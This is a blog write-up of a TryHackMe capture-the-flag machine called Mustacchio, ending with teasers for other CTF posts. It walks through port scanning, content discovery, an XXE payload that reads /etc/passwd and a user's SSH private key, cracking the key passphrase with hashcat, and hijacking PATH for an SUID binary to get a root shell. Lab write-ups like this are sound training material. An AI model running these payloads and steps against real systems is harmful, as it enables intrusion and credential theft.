TryHackMe - Mustacchio

-

Here is Strupo_'s write-up for an "Easy boot2root Machine" called Mustacchio, by zyeinn, on TryHackMe.com.


The challenge was solved by conducting some basic enumeration, exploiting an XXE injection vulnerability, cracking a password, and leveraging an SUID binary to root the system. 

Enumeration

To begin, nmap was used to determine open ports:

$ nmap -p- --open -sV -v -Pn -oA nmap-mustacchio 10.10.81.167

<snip>

PORT     STATE SERVICE VERSION

22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)

80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))

8765/tcp open  http    nginx 1.10.3 (Ubuntu)

<snip>

Manually browsing to the web servers revealed a mustache based blog on 80/tcp and an admin login prompt hosted on 8765/tcp as seen below:

Admin Panel Login

Next, ffuf was used to enumerate content on the web server:

$ ffuf -u http://10.10.81.167/FUZZ -w /usr/share/wordlists/dirb/big.txt

<snip>

.htaccess               [Status: 403, Size: 277, Words: 20, Lines: 10]

.htpasswd               [Status: 403, Size: 277, Words: 20, Lines: 10]

custom                  [Status: 301, Size: 313, Words: 20, Lines: 10]

fonts                   [Status: 301, Size: 312, Words: 20, Lines: 10]

images                  [Status: 301, Size: 313, Words: 20, Lines: 10]

robots.txt              [Status: 200, Size: 28, Words: 3, Lines: 3]

server-status           [Status: 403, Size: 277, Words: 20, Lines: 10]

:: Progress: [20470/20470] :: Job [1/1] :: 319 req/sec :: Duration: [0:01:04] :: Errors: 0 ::


There was not much to review under the /custom directory and so manually browsing to the resource and checking all of the contents quickly found the users.bak file:

$ wget http://10.10.81.167/custom/js/users.bak
<snip>

$ strings users.bak
SQLite format 3
tableusersusers
CREATE TABLE users(username text NOT NULL, password text NOT NULL)
<redacted hash>

A quick google search of the hash returned the cleartext password.

Obtaining User Access

The password was successfully used against the admin portal login page where large text entry box was observed. Looking at the HTML source code also revealed the following comments of interest:

    <!-- Barry, you can now SSH in using your key!-->

and

      //document.cookie = "Example=/auth/dontforget.bak"; 

The contents of /auth/dontforget.bak can be seen below:

$ cat dontforget.bak 

<?xml version="1.0" encoding="UTF-8"?>

<comment>

  <name>Joe Hamd</name>

  <author>Barry Clad</author>

  <com>his paragraph was a waste of time and space. If you had not read this and I had not typed this you and I could’ve done something more productive than reading this mindlessly and carelessly as if you did not have anything else to do in life. Life is so precious because it is short and you are being so careless that you do not realize it until now since this void paragraph mentions that you are doing something so mindless, so stupid, so careless that you realize that you are not using your time wisely. You could’ve been playing with your dog, or eating your cat, but no. You want to read this barren paragraph and expect something marvelous and terrific at the end. But since you still do not realize that you are wasting precious time, you still continue to read the null paragraph. If you had not noticed, you have wasted an estimated time of 20 seconds.</com>

</comment>

This backup file was used as a template for an XXE injection proof-of-concept:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [ <!ENTITY strupo SYSTEM "php://filter/read=bzip2.compress/read=convert.base64-encode/resource=/etc/passwd">]>
<comment>
<name>Joe Hamd</name>
<author>Barry Clad</author>
<com>&strupo;</com>
</comment>

This successfully rendered the base64 encoded contents of /etc/passwd. The first comment mentioned using an SSH key so it was simply a matter of changing the resource value from /etc/passwd to "/home/barry/.ssh/id_rsa."

To turn the base64 blob to an actual key, I copied the encoded text to a file and used the following command: base64 -d -w0 < b64.id_rsa > id_rsa

The key was password protected and so ssh2john was leveraged to generate a hash that could be cracked by john or hashcat:

$ python ssh2john.py id_rsa > id_rsa.hash

John failed to identify the hash. Possibly due to the "id_rsa:" prefix in the output file from ssh2john
 
Ultimately, I installed the beta version of hashcat and ran the following command to crack the hash after removing "id_rsa:" from the hash file:

$ sudo hashcat -m 22931 id_rsa.hash -a 0 --force /usr/share/wordlists/rockyou.txt

The password for the key successfully cracked and it was then a matter of using the key to connect to the box. I copied the private key to my local ~/.ssh/ directory, renamed it "barry" and used the chmod 400 barry command to set the required permissions on the file. 

$ ssh -i ~/.ssh/barry barry@10.10.81.167
<snip>
barry@mustacchio:~$ ls -ltra
total 20
-rw-r--r-- 1 barry barry 33 Jun 12 15:48 user.txt
drwxr-xr-x 2 barry barry 4096 Jun 12 15:48 .ssh
drwxr-xr-x 4 root root 4096 Jun 12 15:48 ..
drwx------ 2 barry barry 4096 Jun 13 03:10 .cache
drwxr-xr-x 4 barry barry 4096 Jun 13 03:10 .
barry@mustacchio:~$ cat user.txt
<snip>

Privilege Escalation

In order to elevate to root, I noticed an interesting looking binary in the /home/joe/ directory called "live_update." Using strings, I could see that it would simply tail -f the access.log file for the nginx web server. 

Initially, I attempted to escape special character encoding and injecting control characters into the user-agent but this was a dead-end for me. 

Next, I checked if it had the SUID bit set and it was! A quick way to spot check is ls -l and you can see the "s" in the permissions, but you can also do a system wide search by using find:

$ find / -perm -4000 2>/dev/null

I then did some searching just to make sure that there wasn't some simple way of dropping to a shell like you can with less but I didn't find anything. Then it occurred to me that if I could update my path to link tail to a binary that I specified, I should be able to root the box. 

I did this by performing the following steps:

barry@mustacchio:~$ mkdir bin && cd bin

barry@mustacchio:~/bin$ export PATH=$HOME/bin:$PATH

barry@mustacchio:~/bin$ nano foo

barry@mustacchio:~/bin# cat foo 

#!/bin/bash

/bin/bash

barry@mustacchio:~/bin$ chmod +x foo

barry@mustacchio:~/bin$ ln -s foo tail

barry@mustacchio:~/bin$ ../../joe/./live_log

root@mustacchio:~# cd /root

root@mustacchio:/root# ls -l

total 4

-rw------- 1 root root 33 Jun 12 15:48 root.txt

root@mustacchio:/root# cat root.txt 

<snip>

Conclusion

This was my first challenge hosted on TryHackMe.com and I really enjoyed it and the service. Signing-up was pain free and it was easy to just jump right into the challenge.

Thanks for reading!

@strupo_

Find us on twitter: @teamWTG

Popular posts from this blog

The Audacity of Some CTFs

-
Image
2021 Update : This is currently the most read post on our blog. Chances are that you are here because you are working on an audio challenge. If you see something looking like a digital signal, be sure to also check out our Radioactive Man write-up. I have stumbled across a few audio files while competing in CTFs over the last few years and I thought covering spectrograms would make a nice and quick blog post. Flags can manifest themselves in many ways when dealing with media files. One of the most common ways I have seen is by hiding them, or clues to find them, in the file's audio spectrogram. According to wikipedia: "a spectrogram is a visual representation of the spectrum of frequencies of sound, or other signals, as they vary with time." Basically, it is a method to visualize sound and signals. I first learned that you can embed hidden messages and images in a spectrogram when a friend showed me an image from an Aphex Twin song some years ago. Equation by
Read more

Code Name: Treehouse of Horror CTF

-
Image
A friend of mine asked me if I wanted to participate, on the sly, in an internal CTF that he put together for his employer. My score wouldn't be shown, and for all intents and purposes I did not compete. I figured I'd give it a code name incase I need to refer to this event. Let's call it the Treehouse of Horror CTF. The Treehouse of Horror CTF! The scoreboard appeared to be similar to the one used at the Defcon 26 IoT CTF, however this one was organized by challenge which made things nice for tracking your own progress versus one huge board of challenges.  I think this is called Jeopardy style. There were some odd moments at times because different challenge groups shared a target, so you had to identify which flag went with which challenge. Really not that big of a deal and I actually really enjoyed the format rather than just a single submit field like at derby or Eversec's CTF as it helped me track my progress with ease. The challenges were: FreePBX Re
Read more

2020 HTH CTF - Cloud Challenges

-
Image
Last weekend, @strupo_ joined team NiSec to participate in the HTH 2020 CTF  and together they got on the podium in third place! 2020 HTH CTF - Final Scoreboard The challenge categories included:  Cloud Crypto Forensics Kali 101  Misc Pwnables Recon Reverse Engineering Steganography Web Recently, strupo_ was fortunate enough to remotely attend  Breaching the Cloud Perimeter w/Beau Bullock . As cloud testing is still very new to him, and this blog tends to focus on introductory concepts and challenges, we thought it would be appropriate to try and tackle all of the cloud challenges in this post. Okay, let's get into it. The Cloud category had three challenges: BucketList (100) OhSnap! (150) Serving Less (250) BucketList Hey guys! I set up an AWS bucket for this year's hth that we can use to store our flags for the ctf. I think I made the bucket private but I'm not very good at this cloud stuff. Send me a message if I need to edit the permissions. Hint: Let's keep a flag
Read more